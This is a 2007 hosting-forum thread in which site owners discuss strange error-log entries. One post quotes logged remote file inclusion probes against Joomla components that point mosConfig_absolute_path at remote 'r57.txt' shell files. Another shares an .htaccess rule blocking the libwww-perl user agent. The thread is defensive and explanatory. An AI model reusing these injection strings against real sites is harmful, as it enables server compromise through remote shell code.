Web Hosting Forum | Lunarpages


*
Welcome, Guest. Please login or register.
Did you miss your activation email?


Login with username, password and session length
June 19, 2013, 08:04:57 AM

Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: odd entry in my error log....  (Read 1750 times)
fstjohn
Intergalactic Superstar
*****
Offline Offline

Posts: 180



WWW
« on: June 12, 2007, 01:54:47 PM »
found this:
Code:
/home/(LP username)/public_html/instmsg/aliases/(username)
in my error log.

it's a bit odd, because any searches I did on it reference Instant Messaging (which I kinda figured) - but we dont have that (to the best of my knowledge) - any thoughts?
Logged
http://www.mortgagecorp.com
http://www.mimbroker.com
http://www.www.mimcommercial.com
http://www.mortgagecorp.com/sonyma.php
Marleen
Spaceship Navigator
*****
Offline Offline

Posts: 96
« Reply #1 on: June 12, 2007, 09:44:53 PM »
I just today started seeing some rather odd entries in my log files too...
Here's two of them.

/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gonfiabiligamespark.it/flash/r57.txt??? HTTP/1.1" 404 1439 "-" "libwww-perl/5.805"

/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://drxrwx.ifastnet.com/57.txt? HTTP/1.1" 404 1455 "-" "libwww-perl/5.805"


Should I be worried?
Logged
TranzNDance
Princess of Naboo
Berserker Poster
*****
Offline Offline

Posts: 11808



WWW
« Reply #2 on: June 12, 2007, 10:02:03 PM »
libwww-perl is an otherwise good tool that is being used by hackers to look for sites with vulnerabilities. From the hits I get, they try to see if my site has a script that is prone to hacking, but I don't have it installed. After doing some research, I read about blocking access from those bots by putting this in .htaccess:

Code:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

It's working. In my error log, I see access to suspicious folders being denied, and the latest visitors log shows that user agent is getting a 403 Forbidden error code.
Logged
Grr..!! Luff Ya Grr..!! Luff Ya Grr..!! Luff Ya
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to: